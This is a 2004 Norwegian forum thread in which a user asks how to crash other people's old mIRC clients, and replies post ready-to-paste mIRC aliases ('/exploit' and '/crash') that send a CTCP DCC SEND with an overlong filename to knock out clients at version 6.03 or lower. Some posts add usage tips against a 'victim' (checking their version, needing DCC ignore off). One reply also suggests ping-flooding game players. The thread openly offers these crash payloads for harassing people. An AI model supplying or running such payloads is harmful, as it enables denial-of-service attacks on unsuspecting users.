Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  20 1263
Er det noen som har, eller kan fortelle meg hvordan jeg bruker mirc exploit. tenker mot gammle versjoner av mirc nå. Eks 6.03. Før hadde jeg 6.03 da var det noen som brukte det på meg. HAdde vært litt artig og kunne det, siden mange jeg kjenner sitter med gammle versjoner av mirc
Sist endret av EXzlator; 26. mars 2004 kl. 21:52.
Google it u mofo :P
utenfor ditt vindu
larsforstyrret's Avatar
Altså det var ikke en ircexploit, ikke en exploit mot selve serveren, men en exploit mot klienten mIRC.
Exploiten utnyttet et hull i dcc delen av programmet.
Ellers så har de på qnet disabla denne funksjonen på ircserverene(mener jeg å ha lest) slik at denne sendingen av informasjon ikke er mulig.
Det er også flere som har lagt til et script i botene sine(tenker da på eggdrop), slik at disse kicker ved slik informasjon.

Med andre ord, exploiten funker ikke bra lengre.
Skaff deg en god linje, og ping folka som spiller cs, det er det som virkelig skaper frustrasjon
EXzlator's Avatar
Trådstarter
hvis jeg skal pinge folk da...holder det med og skrive ping -n ip?
Jeg vet exploiten fungerer på efnet enda. Det var noen som gjorde det mot meg for 8dager siden

Og jeg har søk i google etter det.
Sist endret av EXzlator; 26. mars 2004 kl. 21:40.
Hvorfor svarte svingende pokker klype ta skjønner ikke folk at det er en forskjell på irc og mIRC og hva den forskjellen faktisk er. Måtte fanden ta alle søppelnerdene!
Opprinnelig postet av TipeX
Hvorfor svarte svingende pokker klype ta skjønner ikke folk at det er en forskjell på irc og mIRC og hva den forskjellen faktisk er. Måtte fanden ta alle søppelnerdene!
Vis hele sitatet...
Eeeehm.. Er ikke det samme greia?
∮ F dr = 0
irc er en protokol, altså feks en irc server. og mirc er en client. Et _program_, som kobler seg opp mot irc. altså, vis du har kjennskap til noe annet en mirc, som BitchX, så er det en klient akkurat som mirc.
Skal knækkes
Golder's Avatar
Opprinnelig postet av Plomma
Eeeehm.. Er ikke det samme greia?
Vis hele sitatet...
Eeeehm.. Nei, det er ikke samme greia. mIRC er ett program, IRC er ett nettverk.
Du bruker mIRC til å koble deg til nettverket og ha mulighet til å bruke det.
Det finnes også andre typer IRC "klienter".


På en annen side ser jeg fanden meg ikke vitsen med å utnytte exploiter? Hvorfor vil du det?
For å plage rævva av uskyldige folk?
For å ta igjen mot en kamerat som lurte på deg noe greier?
For å vise at du tror du kan noe?
Æææ, tror han var noe sarkastisk.
Skal knækkes
Golder's Avatar
Opprinnelig postet av nidaroz
Æææ, tror han var noe sarkastisk.
Vis hele sitatet...
I tilfelle vet alle det nå.
Når noen poster så du helt tydelig ser at de ikke kan forskjellen, er det like greit å si ifra med en gang.
▼ ... over en måned senere ... ▼
Irc Exploit :
Legg denne i aliasen i mIRC klienten , og skriv /exploit nickname
Funker bare på mIRC v6.03 og lavere!

/exploit /raw privmsg $1 :DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
m0b
m0b's Avatar
DonorAdministrator
Og skal gjøre hva?
m0b, den stenger ned mIRC Clienten..
Opprinnelig postet av Flaffy
Irc Exploit :
Legg denne i aliasen i mIRC klienten , og skriv /exploit nickname
Funker bare på mIRC v6.03 og lavere!

/exploit /raw privmsg $1 :DCC SEND "a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
Vis hele sitatet...
Denne virker forresten ikke, ett eller annet galt i koden tror jeg...

Edit: Jeg fant den det skal være, og jeg legger den ut her, men jeg er ikke ansvarlig for noe av det dere bruker den til! Dere bruker den helt på eget ansvar og jeg står ikke som skyldig hvis dere crasher mIRCen til en berømt CS spiller rett før en kamp eller et eller annet. (Vil ikke ha hele CS verdenen etter meg )

Kode

/crash { privmsg $1 $chr(1) $+ DCC SEND "x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x" 0 0 0 $+ $chr(1)
Legg denne til i Aliases, og bruk den ved å ta /crash nick
Sist endret av dadyd; 26. april 2004 kl. 20:02.
m0b
m0b's Avatar
DonorAdministrator
Installerte en 5.91 klient og testet crash aliaset du posta dadyd, funka ikke dette nei.

Forøvrig mangler det en } i aliaset.
Opprinnelig postet av |d13m0b
Installerte en 5.91 klient og testet crash aliaset du posta dadyd, funka ikke dette nei.

Forøvrig mangler det en } i aliaset.
Vis hele sitatet...
Sukk, du kan ha den aller nyeste mIRC klienten, det er offeret ditt som må ha 6.03 eller tidligere.
Dette kan du sjekke ved å ta en ctcp version request på dem.
Den virker helt perfekt, jeg testa den akkurat for 2-3 minutter siden på meg selv fra min nye klient på min gamle,
og det virka som tusen .
Offeret ditt må også ha dccignore av.
m0b
m0b's Avatar
DonorAdministrator
Altså, jeg er da såpass rutinert at jeg ikke installerte en klient og satte aliaset inn i den - hva tar du meg for?(jeg har faktisk brukt mIRC siden så tidlig som 1996 :P). Jeg installerte selvfølgelig klienten på en annen pc og testa aliaset mot den klienten. "sukk" på deg selv..
Sist endret av m0b; 26. april 2004 kl. 20:20.
nFF Marshall
morten's Avatar
Dette er jo så gammelt nytt at jeg faktisk vurderer å stenge tråden, bare på det grunnlag av at dere suger hele gjengen
Opprinnelig postet av Golder
Eeeehm.. Nei, det er ikke samme greia. mIRC er ett program, IRC er ett nettverk.
Vis hele sitatet...
irc er en protokoll, efnet derimot, er et nettverk.

edit: blærk leste ikke adrian sin post